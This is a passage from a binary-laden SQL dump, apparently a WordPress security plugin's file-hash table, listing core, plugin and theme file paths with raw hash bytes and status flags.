��O�/�',']��uZQ���Oc]�n�.fN�w�07C�_D�','',0,'?'),('#煽$8f5m�v�5�','wp-content/plugins/wp-cerber/nexus/cerber-nexus-master.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����ng�\Z?G��','2��(��\0^ȧ��pxA�f�^d������pm','',0,'?'),('#�\\M��@�0���T�','wp-includes/blocks/post-excerpt/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Qj�)O=S�R��','oC�l\'�6IJ�j���2�\'\Z�l\'�\n��}{','',0,'?'),('#�-g�\\L%3�S݋B#\r','wp-content/plugins/wordfence/images/wf-horizontal.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E%Z�l��o9͒����','��0	��6�ӭ�Iv����hJ��`����','',0,'?'),('#�ۘ�ƿ��.u�L� ','wp-content/plugins/redirection/locale/json/redirection-en_GB.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6f^߫:vs7=�-�H��','�J�{3L&�{���0��*�[��j� �-(�','',0,'?'),('#̓\\�	����b��X�','wp-includes/wp-includes/sodium_compat/namespaced/Core/Curve25519/Fe.php',0,'��	��I�ݶ�3��S','��	��I�ݶ�3��S','!MڒޫDw����we(�!��=��ިd��,GW','',0,'?'),('#�)_�۱�Y����h}2','wp-content/plugins/wordpress-seo/src/presenters/debug/marker-open-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�ȟ�w �k8�','����o-�\r�z�/�}�� ��q�s��u��R�','',0,'?'),('#�vk��f���W��','wp-includes/wp-includes/js/mediaelement/wp-playlist.js',0,'�����X�l\"�o�','�����X�l\"�o�','�/=àBAo&���I�1��]k~�N���','',0,'?'),('#�B�++q���\Z','wp-content/plugins/wp-fastest-cache/images/cancel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@��bR<��t筆�X�','(1q�d�n\\��S�R�m��z��T1��r�','',0,'?'),('#��iU�f�����zhJF','wp-includes/sodium_compat/autoload-php7.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������n��4��','�-��r*H��^��O�<�a{����X�@�g �+','',0,'?'),('#�S�\"�G9���_`�','wp-includes/wp-includes/images/spinner.gif',0,'�L�\nD�\n�oً�j˲�','�L�\nD�\n�oً�j˲�','zƄ�\Z\"��n\Zs�(�U�/~�7��F��^…�','',0,'?'),('#�����^C���%��k�','wp-content/plugins/wordpress-seo/admin/capabilities/class-capability-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[D�g<.vܩH#k�SI','�v(��JG��D�W�_<3O63�m��\Z�','',0,'?'),('$���^$�L�K�a!_','wp-content/plugins/wp-smushit/app/pages/class-directory.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��zW�i\rRUpz8I�J','o��������F��\Z�>��q�&���)','',0,'?'),('$˴��\0��JP�[���','wp-content/plugins/wp-cerber/assets/flags/ca.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J��\'_���ǧ��G��','q�[Y����BsC;p^�*�j�\"mO��7��','',0,'?'),('$5������^р��','wp-includes/wp-includes/js/plupload/handlers.min.js',0,'T_\'!;��QYЦIk&Q','T_\'!;��QYЦIk&Q','�I��Zh�y8s��Cv����rTVRḾ','',0,'?'),('$7y���]���N�','wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F����Y�`�8�','^�z�y�{b�.n�&o@�{�<,�$��}�','',0,'?'),('$8}��eD$�赑�','wp-content/plugins/redirection/fileio/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A{=]���_�p,0','p�Ϛ.o�v�%�L�8CB����M�\'�l�\Zg','',0,'?'),('$9^�d΋���ڬ�K��','wp-includes/wp-includes/js/dist/vendor/wp-polyfill-object-fit.js',0,'���j	\r�<l�J�l�','���j	\r�<l�J�l�','[�a6$sp8����Y�Q�\'��1��\0�Dح','',0,'?'),('$;Q�C�G\n�P\n','wp-content/plugins/wordpress-seo/src/deprecated/frontend/class-opengraph-oembed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���#�v̷\r���nM�','�ոF\'հ�g-ql)Q���/5��}�t0l\r�$','',0,'?'),('$<�y�V�`L�\n�e�F','wp-includes/wp-includes/class-wp-block-parser.php',0,'%�}�C�1gGr*� �7','%�}�C�1gGr*� �7','&t�]�Y`�쿨�9}���܇W���-','',0,'?'),('$I��ٍ�`�	��:tV','wp-includes/wp-includes/class-wp-meta-query.php',0,'K��C��̚{\"Hp�=','K��C��̚{\"Hp�=','��R�����l��	�n���\\��h����ݢ','',0,'?'),('$QM��ܳX�8�֝)wR','wp-content/themes/hitmag/inc/kirki/core/class-kirki-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɥ�KB>��9\n�0E��A','{cg�L�(J�Rk�i4u����kC����ٚ\n','',0,'?'),('$Vw����;!�:\Z�a�','wp-content/plugins/redirection/locale/redirection-fa_IR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�/I ���^9���','*xz��%Q?5d�wT�\nsl�A�)��ϬX','',0,'?'),('$\\?�ɶƚ,��ҙ�','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ᚹs\Z�\ZF��\0%f`','�)̃�ܹX#ܘ�^\"w���L1��\rOX?˻','',0,'?'),('$t���\\�p=-a�','wp-content/plugins/wp-cerber/languages/wp-cerber-fr_CA.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ԇ���@k�����$','|�Q�/�8o�@zn� X�O�FUJ�)��J��ѯ','',0,'?'),('$�w�7���@)s&��V&','wp-content/plugins/all-in-one-wp-security-and-firewall/images/error.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¨S�N]eD6�����@','<�j��3a���a��k�l-X���','',0,'?'),('$���z\r��D���HP','wp-includes/wp-includes/js/wp-emoji-loader.min.js',0,' #j��2��\'5�!�gM',' #j��2��\'5�!�gM','����϶.�X���po�I3���fY��cMʲ','',0,'?'),('$��::����t����','wp-includes/wp-includes/js/dist/block-library.min.js',0,'`\\{�O�\Z�sl=��','`\\{�O�\Z�sl=��','��Pu6��Qi��D�9ï��_�iZ�G��Ad��','',0,'?'),('$����0S\r�r���','wp-includes/images/smilies/icon_redface.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����U���E����','>���D�C9M�cJ�\Z+U���L1f+g���','',0,'?'),('$��S�Ck��d�W�','wp-content/plugins/wordfence/views/scanner/issue-timelimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!��\"��V%		|','�X>����[6_��\\��a�3�����s�V','',0,'?'),('$��� ~</��aR�','wp-content/plugins/wordpress-seo/src/conditionals/third-party/wpml-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ia	~P�V��D/\r�','�O�g§Ʉ��zX�J�Rf�yJ�Ŷ','',0,'?'),('$�L�-�`���*$-���','wp-content/plugins/wordpress-seo/css/dist/structured-data-blocks-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/x��<�>�\rX��','�[�\nͭ?d�����:�L�\'�A�Iz��b��','',0,'?'),('$���C����/�9��','wp-includes/class-wp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1SD	�(S�(���V�w','c;��[y\\z;Mɏ�{%��܌k�/��cf�ƹ&','',0,'?'),('$��P���Xu�����','wp-content/plugins/wordpress-seo/inc/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','��	蚠{�c�FJ�w��!}a���9�','',0,'?'),('$̰��_�}��R��y','wp-content/themes/hitmag/inc/kirki/controls/php/class-kirki-control-switch.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ut���ם�;9\06','܄H��	�X�;���:� �!Oy��)�nY�Q','',0,'?'),('$�(\r=m*�s\rPj}\0�','wp-content/plugins/wordpress-seo/css/dist/search-appearance-1851-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������y��kq�','�p\n��7�3��sC�?��� +�S�l��/%','',0,'?'),('$�z�\0�r������\rg','wp-content/plugins/wordpress-seo/src/integrations/schema-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��j���VGG���L�P','�=����r�Y�vTb�����>߁,�nc�\rM','',0,'?'),('$��-#q`�l�$W�ۉ','wp-content/plugins/wordfence/lib/live_activity.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ik���s','^&�V�b��,��s��B^�R�4�Ѹ����V','',0,'?'),('$��|��c�� \\~��','wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�^>�5�pa��W��>','���������DC��XG4WFP�#�N�S\Z','',0,'?'),('$�GE�k�<[����','wp-content/plugins/wordpress-seo/src/integrations/watchers/auto-update-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�ZbH�r�&p�e�','���G�����b7�_+����{�i���x2�6','',0,'?'),('$��^���6bH^�*��','wp-admin/options-privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�}A%ljS/�Gr^','���ݮ�zX��L1�j/Dŝ��T�����','',0,'?'),('$��߰�R�\r��ab8!','wp-content/plugins/wordpress-seo/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�i\Z	R� \\�q#�g�','Wk�?���SЀ�?�f>QOT\'��6�p�r�P�T','',0,'?'),('$�ϫ/����!��C�','wp-includes/IXR/class-IXR-introspectionserver.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ua�w�<�Iw�p�O7-','��\n���C����PEQ%�D\r�k*�X���o','',0,'?'),('%��	�w�eGf','wp-content/themes/hitmag/inc/kirki/modules/css/field/class-kirki-output-field-dimensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|\Z?G�K�_8�7\\','�\n�2Fzh�<� �6:*�\n\"Z�V��kpR��O','',0,'?'),('%	n�\r3\Zޝ�:�E','wp-content/plugins/wordpress-seo/src/services/health-check/default-tagline-reports.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W���٧�Kc#�y��M�','Zfa|%�zX��S[q���� ��B),���','',0,'?'),('%	���ſ�kuX�b���','wp-includes/blocks/read-more.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r?�Ə�{j5�','�P��W��2�������W^&�eS�$|Z;�','',0,'?'),('%�]M�3�T�1T��/','wp-includes/blocks/preformatted/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3$�O�-���i4Q�i>','��u��:�Sđ�i�{^t�ZH{&��i�','',0,'?'),('%����7��娳�','wp-content/plugins/wordfence/waf/wfWAFUserIPRange.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y�FH��\'\'n��ގ�','KD[Rஞ� ��5�:grP7*X\Z','',0,'?'),('%f�Nvn9�,\r�W�','wp-includes/blocks/post-template/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�i�b��Ph�D','�[s%|�9190��\\<s�Bc-�{S�FJa\'���','',0,'?'),('%$���M�q�T<��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C��UO��\Zߠ�xtH','�G\n\"�_/A�g�h	U?�S�s�H�ב�Y��ٳ','',0,'?'),('%)c���j�6�6�BK�','wp-includes/wp-includes/customize/class-wp-customize-nav-menus-panel.php',0,'�$�K͞�u	Q�� �p�','�$�K͞�u	Q�� �p�','�/\'V\ZVtb\"���d����s\"e��@���I<','',0,'?'),('%.�.Ct�=����\\`','wp-includes/sodium_compat/src/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�cJ>|Eqv0|bv�� ','ܟ�j�pe�M�N�?���a��Xi+!S�2','',0,'?'),('%9o��	�{����o','wp-content/themes/hitmag/inc/dashboard/theme-info.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','BK�`s�S���:�I5�',';e	��L�ٯS�X%ENK �vtn��0G���','',0,'?'),('%D?�m1QZ\"�cAXQq�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G���=���1\nV�0�','8}�>��k6`��uid��eH�P�^�','',0,'?'),('%[���;a�-�ٯ','wp-includes/wp-includes/class-wp-theme.php',0,'���ɱ��h�k2\\���','���ɱ��h�k2\\���','��8B�^���K��ڝo�d#T��s\0����C','',0,'?'),('%i����gca�W�!q�','wp-includes/blocks/cover/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C-��9�7a�1yo','�lν�~_s\\�BF�_�=����1�J�e�9Q�_','',0,'?'),('%k^�}���s�*�n�','wp-includes/wp-includes/js/api-request.min.js',0,'��k#�(�ĩ����','��k#�(�ĩ����','\\���Q�M�`�$�ڣg�E�\0|�Pne�r]','',0,'?'),('%m|�F�!��z���S8','wp-content/themes/twentytwentythree/assets/fonts/source-serif-pro/LICENSE.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��UZ)�\'�a�5�@�','D��i\"�Ǟ�t۱�R@�8�����uvu','',0,'?'),('%���V�Ћ]��=w','wp-content/plugins/wordpress-seo/admin/class-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��̖o���RJ�','�-�<yt�X.�%�W#�pQ��D�,١����','',0,'?'),('%���9��\\ދ�','wp-admin/includes/class-wp-site-health-auto-updates.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','](��ȝ*<��q0\0�N�','^~�p�H:��� @��K=�g�}z�2\"�\Zh��','',0,'?'),('%��|�-���X�2`JV','wp-admin/images/about-texture.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�m{oQ����KU','J>�\\ˌk~2����r!��!�ti+�\0�','',0,'?'),('%�纺+jM����7l','wp-content/plugins/wp-fastest-cache/languages/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0��	��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('%����8^�V<�t�','wp-admin/edit-tag-form.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R	�\"�\'O�\0�e�ڍ�','�Rt�K^b�h���y���8P\r��oV�c�q','',0,'?'),('%�fW���	�P0�}+','wp-content/plugins/wordfence/modules/login-security/img/menu.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"�	+h\"Fb��','',0,'?'),('%�Pb.��8�Gd�t�','wp-admin/css/media.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p��B6�_Hf���n[','�$ϵ�Av���5\Z9���N���umx<;n\\U','',0,'?'),('%�~2\" ض=�ǿ\Z^�','wp-content/plugins/wp-cerber/assets/magnific/magnific-popup.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0���vre����\n�`�','�X�;��Ɛ��9�@u�j�m�[��F�\"!�','',0,'?'),('%�dix�!j���!','wp-content/plugins/wp-smushit/app/assets/images/plugins-smartcrawl.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"ͫ����_�V̅�Y','�a���H��,i��h��Йu�c-����ֆ\'','',0,'?'),('%���](2te��(�`K','wp-content/plugins/wordpress-seo/src/models/primary-term.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�����fP,�!�','Y��Г҂`�Q�$6G���OcWYGJ��/','',0,'?'),('&8Hӧ�+Xzi\n�','wp-content/plugins/wordpress-seo/js/dist/languages/tr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�b)�\n\0�Ahl�\0iQP','I݇\0\0��If�\0\Z�y��^A��\Zi','',0,'?'),('&3��9Q&m��Oc�Q','wp-includes/blocks/post-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','8�xRR3AN��e�ה�','2��p�9�d�Up&;�\r�`\rL�s���Y�{L','',0,'?'),('&PDt�?5u�1Ym��','wp-content/plugins/wordfence/crypto/vendor/composer/installed.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����q�jy*_iI�','��z�~t�i������D�5\Z�9l9;�I�','',0,'?'),('&\Z��b8���f�M=u','wp-includes/wp-includes/spl-autoload-compat.php',0,'6��u�{�t���','6��u�{�t���','��,�Z\rM	>܅��g�p�/�	Z\Z#`!�.','',0,'?'),('&*���dĆָ�	�H5','wp-admin/images/align-center.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	�\Zݶ�4y�dY1�e�','�놽N3�X!��lj�h`�����hA]�J�','',0,'?'),('&=\Z�+t�\"�/k\'\n','wp-includes/js/jquery/jquery.form.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g|/	h�	q�@(�]�(','���MY̭t&�\"�7#�?f	�]�cy#`a�','',0,'?'),('&C_�I�B�� �,g','wp-content/plugins/wordpress-seo/src/deprecated/admin/taxonomy/class-taxonomy-settings-fields.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M/p�٢�\n(�m���','t����N�k]�b�E��)4��d\0@��\r~�','',0,'?'),('&J�IH̀}�O]�l�','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-permalink-warning-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�@<����\'�O��','�i�O}����f�t��=�ю|Y���:���','',0,'?'),('&P�wZ�Ԙ�M��չ�','wp-content/plugins/wp-smushit/_src/js/smush/media.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ca0�����_C��','m[AK��HEە��WiSo���0@�1�{��','',0,'?'),('&W+��s�~;��*�','wp-includes/wp-includes/js/jquery/jquery.form.js',0,'Њn=i���f���5]','Њn=i���f���5]','�5\\�\'=\'�*m%,�kC!<���2�m=�','',0,'?'),('&ee�\n3K���vZ��','wp-admin/ms-delete-site.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d\Z�u�E66&\r�o','�*Mo��x�U�LGҟxnb\0��<2u�����','',0,'?'),('&k\0v_fcb��v�����','wp-includes/js/dist/format-library.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Hs��=�x�<�į','F�!�OqPG�ȿX�`�w�2�l��Z�x+\n','',0,'?'),('&s�R������X�<��','wp-includes/blocks/separator/theme.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��EO�c���m��{��','�/`i-^�3җ;�B��T�;����#\0�r�}:j','',0,'?'),('&t!0^g��bJ�c,>3','wp-admin/upload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r+����fNF','��qV��R%���H���ij��`J�=��(.','',0,'?'),('&}�1�5�6��I�','wp-content/themes/hitmag/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r\'�]�>\\v\\�2��\ZM','qo�O$K]���g3�n��Ò�ѐ�~��(�R�','',0,'?'),('&~ڐ��g��N�I%`','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/post-type-content.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B����W-����\"�b','u�Ah� �@��\r���P�#V`Xn��~�','',0,'?'),('&~�*m�E+nX�%;[O�','wp-includes/css/dist/block-library/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0&�\"�e�U�(޽��','ӄ��Z�m�b�\0���)��+���d{�_���','',0,'?'),('&D���Q�R��w�]','wp-includes/sodium_compat/src/Core/ChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-r�jiI�أe�b','��b��E����&q�����*��������','',0,'?'),('&���\rGd��e�Z�^�','wp-content/plugins/wp-fastest-cache/languages/wp-fastest-cache-tr_TR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��rr�=hpǴ�7','TL��y�>�\"��:—�@�/L�9�)gV��\'z','',0,'?'),('&���ɚ%��)�W&�i','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>XVD��m�|P6\n','�l=�b:џ��	R�Z��	�����	��6','',0,'?'),('&�;%�8I�R/+��\n`.','wp-includes/wp-includes/js/tinymce/skins/wordpress/images/audio.png',0,'7~!���\0����\"w','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('&���5-خ|̫�yE','wp-content/plugins/wordpress-seo/src/deprecated/admin/add-keyword-modal.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g�4S���˿��A{','�jt$q��t�ąJ�>���0?gv��x�~�h','',0,'?'),('&��]��lX��','wp-content/plugins/wordfence/css/license/premium-global.1647958122.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٬5�&���]U��\0','=:I��#_A�\\R���֣X��F��SO��re�c','',0,'?'),('&���Rw?~�j�hJ�D','wp-includes/Text/Diff/Renderer/inline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n�n5�P�����B\'�','X�U.k⻺�@-(��5�N�����V','',0,'?'),('&��&N��`�b�\n۷�','wp-content/plugins/wordpress-seo/src/deprecated/src/presenters/admin/indexation-warning-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�z>\nN:��%�	:L','G6.�X����Q@�¼[+�@@�y|�(��:>kW','',0,'?'),('&��]0W��\n)�=��','wp-includes/js/tinymce/plugins/directionality/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Er�HD��D��3��@','<����o�@�:����-�Eg���)6^Ѽ\'��','',0,'?'),('&ľ�=�@zy�v�T~','wp-includes/wp-includes/js/dist/deprecated.min.js',0,'T�\\O���d�#��s�u','T�\\O���d�#��s�u','�`<�`qn�̀��\"�`�*���t�����y�','',0,'?'),('&�`�O�Q5�Q�43�','wp-admin/theme-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��¤z:\Z@@��3�','!�B�Q�Ot���!��\r�S��#����5c','',0,'?'),('&���	P�shcusS','wp-content/wflogs/attack-data.php',0,'#ح\n���y�Ib�\r�\r','#ح\n���y�Ib�\r�\r','l��4Eq�{���������\'wg�31�c�w:�','',0,'?'),('&��tQ\\�j`�q��Y�','wp-includes/blocks/categories/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{:\Zn	Yi�!�@�\'�-�','!G1І� d��zG�|(}��w*=�>U�tU','',0,'?'),('&�vA��Q��c��qw8,','wp-includes/theme-compat/header-embed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Omz8��F����','�����})d!q	,@,��j��v	����E���','',0,'?'),('&��!v���\'&�Ji','wp-includes/wp-includes/customize/class-wp-customize-nav-menu-section.php',0,'��ԡ�P�\n}�$','��ԡ�P�\n}�$','�vG~?t7\0��h�R,��|�]9��p�.J�w','',0,'?'),('&�M@G��CSbmW���','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hr.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:����r�,}��`1_�','�Ji�B�:��:��8��y�Z�#H�F&@�Z��W','',0,'?'),('&��8df�g*V��-','wp-content/themes/hitmag/inc/kirki/assets/images/2cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"K���a(�L\ni��C','�Nq^��x��Аtn;-I3o����Cp\"B�t','',0,'?'),('&饱����W��؀�|�','wp-includes/widgets/class-wp-widget-links.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��#����F��>�X�nl','�쇉���,�x���-��DO�,��7ш�Q�','',0,'?'),('&�Y���z�q�[F�f@�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ⶨ�;*���?��z�','���:O.�\'�~y��@�Y`FMN�:�n�.�;q@','',0,'?'),('&���PV�w��Ss','wp-content/plugins/wp-cerber/cerber-2fa.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ӥ?��t���On��','�o�[�m��z�H���\'8��L���,�\\8V','',0,'?'),('\'y��Ƙ�\n�i�','wp-content/plugins/wordpress-seo/admin/google_search_console/views/gsc-display.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�F�?+����K����','3I�G+���W8���X�w�\"��(l�\r��Cӄ','',0,'?'),('\'Vq��񾋕�A��','wp-content/plugins/wp-smushit/app/views/dashboard/upsell/meta-box-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n4�$����:���','�ֈ������9� ��0#�0c�%ג����','',0,'?'),('\'\Z6�a��K�c�U��y','wp-content/plugins/wordpress-seo/src/services/health-check/reports-trait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LEÁ�9�sW	��a','�(��_m[|�sQ3`d���e�U�T��$:���','',0,'?'),('\'t2)�KD��-{��','wp-content/plugins/wp-fastest-cache/templates/timeout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�>AQ�������','=-T���ؕ�\0��	�d�\r��!X','',0,'?'),('\'6��Ѩ����p ��','wp-content/plugins/wordpress-seo/inc/sitemaps/interface-sitemap-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�e�Gtsž����]','%J�\r%<� ٭�f�e!^n\'�͸�^��6�B�','',0,'?'),('\'=!Za��a���jU�Q','wp-admin/css/site-icon.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���}�E���p0lu','i>œӺ#�&�2Z�\'��K(*�����','',0,'?'),('\'>��C͍z9!F\Z��','wp-includes/wp-includes/js/jquery/ui/effect-transfer.min.js',0,'�&��H������*��l�','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('\'Ac���,	~�6�ܦ�','wp-content/plugins/wordfence/views/onboarding/tour-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�:��%� �);�\0','\Z��\'ġ맪���.s\'��sd�4�^��I','',0,'?'),('\'M��w�񑍷���\rKj','wp-admin/includes/class-wp-site-icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j�uWYv��_��','\"�dB)c���̫�e���|�]B�ؗ0y4j�','',0,'?'),('\'d�����TG�*��','wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/pl.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��t=ur����bdp','��Qw\nM�#�Ԙ��k{t�ݘލ�z\n��@r��','',0,'?'),('\'g���w�Q����','wp-includes/wp-includes/js/media-grid.js',0,'BN5�d��b�i^&ޖn','BN5�d��b�i^&ޖn','��$�#�& v��PS�u{Z�)XÜ����ֱ�','',0,'?'),('\'j��<�9@���_��','wp-content/plugins/wordpress-seo/css/dist/yst_plugin_tools-1851.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x,�Q��O��v��','>��=E��K��c��xA��|\Z*�$�x','',0,'?'),('\'p�K��r��� �X_.�','wp-includes/class-wp-theme-json-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_x���u��7��C4Q��','��=0Z֝;τ�t�!�ǐ��\0����z�','',0,'?'),('\'q�� ��e�����c','wp-content/plugins/wp-cerber/assets/tpicker/jquery.timepicker.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD�Z3���nR��w','�c�4r)|��V��_kZ�n��:\"���Q%��','',0,'?'),('\'y�m���]����','wp-includes/wp-includes/feed-rss.php',0,'iJ�?YC�>^��f�','iJ�?YC�>^��f�','�fl�P��f5�2tY3�x���D��ׄ�','',0,'?'),('\'{�~�I`�Q����Z','wp-content/plugins/wordpress-seo/images/Assistent_Time_bubble_500x570.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�)���TZ���\0','��R6#:c˝~�\Z�i�,�Bצx�SP��s','',0,'?'),('\'���� �o���S��','wp-content/plugins/wordfence/images/icons/ajax3.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mw�ߴtꍓ\'\n���s','�dz��\n�yK�Ʈ��\'#]�x	VJR��.=:','',0,'?'),('\'��9 \Zid��E�<��~','wp-includes/wp-includes/default-widgets.php',0,'0�t��<�޸��!�','0�t��<�޸��!�','�^�\'U9�;dOˊSz��!S��m��>I5�\'�e�','',0,'?'),('\'��� 